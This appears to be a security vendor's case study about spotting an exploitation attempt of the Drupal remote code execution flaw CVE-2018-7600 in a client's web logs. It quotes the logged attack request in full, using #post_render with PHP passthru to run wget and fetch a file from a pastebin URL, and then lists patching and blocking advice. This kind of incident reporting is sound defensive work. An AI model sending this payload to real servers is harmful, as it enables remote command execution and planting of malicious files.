: A global management consulting firm with locations across the USA and UK.
: EventTracker Co-Managed SIEM services, advanced endpoint protection, and behavior analytics would deliver added protection for company assets.
: The Drupal CMS
v7 and v8 are known to be vulnerable to a remote code execution attack. CVE-2018-7600
provides details. After the vulnerability was disclosed, the EventTracker SIEMphonic team monitored web logs of external facing web servers for evidence of such attack.
: A few weeks after the disclosure of the vulnerability, an attempt to exploit was observed as follows: /?q=user/password&name[#post_render]=passthru&name[#type]=markup&name[#markup]=wget
HTTP/1.1. Note the use of #post_render
& name parameters
, targeting user/password
request, using PHP's passthru
function. The payload retrieves a host where the host name of the target is prefixed (pastebin.com/raw/tBqLLGbw+-O+spy0x.php) to the host name to be retrieved. The return code was 200 and attacks were observed from a hosting provider in Amsterdam, NL
: The EventTracker SIEMphonic team made the following recommendations:
- Upgrade to the most recent version of Drupal 7 or 8 core.
- If you are running 7.x, upgrade to Drupal 7.58. (if you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update).
- If you are running 8.5.x, upgrade to Drupal 8.5.1. (if you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update).
- Block the IP addresses in the proxy and firewall.
- Investigate further on the internal source system and Proxy devices.
- Install the latest version of your web server software, and ensure that all patches have been applied.
- Check the browser and system infection, and run the anti-virus scans.
- Use a Web Vulnerability Scanner and integrate it with EventTracker.
- Harden and update Proxy and firewall with the IOCs.
: Vulnerabilities are a fact of life. They exist and are disclosed and patched by vendors. Keeping on top of these across all vendors is a thankless and endless, but critical task. Absent this, attacks like Equifax
will occur. Eternal vigilance is critical.